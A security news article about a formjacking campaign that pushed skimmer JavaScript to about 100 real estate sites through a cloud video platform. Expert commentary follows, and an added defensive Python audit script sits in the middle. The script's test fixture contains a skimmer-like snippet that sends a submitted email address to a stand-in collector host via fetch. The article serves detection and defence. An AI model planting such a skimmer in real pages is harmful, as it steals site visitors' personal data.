
Formjacking campaign leverages cloud video platform to target real estate company


Researchers reported on Monday that they uncovered a supply chain attack that used an undisclosed cloud video platform to deliver the same formjacking (skimming) campaign to around 100 real estate sites.

In a Palo Alto Unit 42 blog post, researchers said cybercriminals injected malicious JavaScript code to hijack a website and take over the functionality of the site’s HTML form page to collect sensitive data. For the attacks covered by the research, the JavaScript was injected into the video itself, so that any website importing the video also embedded the skimmer code.
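The mechanism described above (a third-party embed that brings skimmer JavaScript onto every page that imports it, where the script reads form fields and ships them to a server the site owner does not control) is something a site owner can audit for on their own pages. The following Python script is an added example, not Unit 42's tooling or anything from the real estate company; it parses a page's HTML, flags third-party scripts loaded without Subresource Integrity, and flags inline scripts that both read form inputs and contact a host other than the first party. The host name, the page fixture and the heuristic patterns are all constructed for illustration.

```python
"""Audit an HTML page for third-party script inclusions and inline
skimmer-like behaviour. Added example with assumed heuristics; not the
tooling used in the Unit 42 research."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical first-party host of the page being audited.
FIRST_PARTY_HOST = "listings.example-realty.test"

# An inline script is suspicious only when it does all three of these:
# reads form fields, performs a network send, and names a foreign host.
# Each pattern alone is ordinary front-end code.
FORM_READ = re.compile(
    r"querySelector(?:All)?\s*\(\s*['\"](?:input|form)|FormData\s*\(|\.value\b")
EXFIL = re.compile(
    r"\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\s*\(|\.src\s*=")
URL_LITERAL = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collects external <script src> tags and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # (src, has_integrity_attribute)
        self.inline = []        # inline script bodies
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)           # HTMLParser lowercases attribute names
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> content to handle_data, possibly in chunks.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))


def audit(html, first_party_host=FIRST_PARTY_HOST):
    """Return a list of (severity, description) findings for one page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, has_integrity in parser.external:
        host = urlparse(src).hostname     # None for relative (first-party) paths
        if host and host != first_party_host and not has_integrity:
            findings.append(("warn", f"third-party script without SRI: {src}"))
    for body in parser.inline:
        foreign = {h for h in URL_LITERAL.findall(body) if h != first_party_host}
        if FORM_READ.search(body) and EXFIL.search(body) and foreign:
            findings.append(("high",
                             f"inline script reads form fields and contacts {sorted(foreign)}"))
    return findings


# Constructed fixture: one first-party script, an embedded player without SRI,
# an analytics script with SRI, a benign inline script, and a skimmer-like one.
SAMPLE_HTML = """
<html><body>
<form><input name="email"><input name="q"></form>
<script src="/js/site.js"></script>
<script src="https://cdn.video-host.test/player.js"></script>
<script src="https://cdn.video-host.test/analytics.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script>
  var q = document.querySelector('input[name=q]').value.trim();
</script>
<script>
  document.querySelector('form').addEventListener('submit', function () {
    var v = document.querySelector('input[name=email]').value;
    fetch('https://collector.invalid/c?d=' + encodeURIComponent(v));
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for severity, text in audit(SAMPLE_HTML):
        print(severity.upper(), text)
```

Run against the fixture, the audit reports the player script as a warning (third-party, no integrity hash) and the last inline script as high severity; the first-party script, the SRI-protected analytics script and the benign inline script produce nothing. SRI alone would not have stopped the campaign described here if the platform's own script was the carrier, so the inline heuristic, or a Content-Security-Policy whose connect-src and form-action directives name only expected hosts, is the complementary control.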

After analyzing the sites, Unit 42 found that all of the compromised sites belonged to a single parent company. Palo Alto has since worked closely with the cloud video platform and the real estate company to help them remove the malware.

“We are publishing this article to alert organizations and Internet users to the potential for supply chain attacks to infect legitimate websites without the knowledge of these organizations,” the researchers said.

By injecting malicious code into front-end web pages, formjacking campaigns are a common way for threat actors to steal sensitive data, explained Hank Schless, senior director of security solutions at Lookout. Schless said that because the threat actor can customize the malicious form, it could easily slip in a field that is only tangentially aligned with the actual purpose of the host website. For example, Schless said, in this incident with the real estate site the attacker could ask for all the basic information but add a line for the user’s Social Security number to “validate their credit.”

“This same tactic could be used to sweep employees’ corporate login credentials,” Schless said. “Creating a fake login form would be as easy as any other data collection form. Regardless of intent, the biggest lesson from this incident is that it is necessary to know who has access to your cloud-based assets and how users interact with the data. Whether it’s a front-end web page or sensitive data stored in your back-end infrastructure, visibility is paramount.”

Jake Williams, co-founder and CTO of BreachQuest, said that whenever a malicious actor can insert JavaScript into a website visited by a victim, the malicious actor effectively has full control over the browser’s actions on the site. As such, Williams said, the impact depends on the types of sites into which threat actors can embed their malicious code. As the Unit 42 researchers noted, formjacking attacks typically divert or copy data intended for submission to the legitimate site to a threat actor-controlled server.

“So the impact of a formjacking attack in most cases will be guided by the types of data legitimately submitted to the site,” Williams said. “In the specific case where threat actors were targeting real estate sites and where users would typically not provide much sensitive information, the specific impact of a formjacking attack is unclear. However, we can imagine situations where a real estate site might be linked to mortgage lenders. Once the threat actor injects JavaScript into the website through the video player, they control where these links go and can leverage them to collect more sensitive information from visitors. Due to the characterization of the original real estate victim, tricking users into providing high-impact data on the website seems unlikely.”

Chris Olson, managing director of The Media Trust, added that formjacking attacks are usually not one-off, isolated incidents. He said more often they represent large-scale attacks that leverage third-party plugins to affect thousands of websites at once.

“Third-party code is the real common denominator behind most web attacks: no matter what language it’s built on, malicious actors will always find vulnerabilities to exploit,” Olson said. “As the Unit 42 article demonstrates, form hijacking attacks are often obfuscated to evade detection by common blocking tools. In our experience, they are also often polymorphic, changing or disappearing between sessions to dodge even advanced malware scanners. Organizations cannot rely solely on automated solutions; they must control their digital providers and constantly monitor the activity of their online domains.”
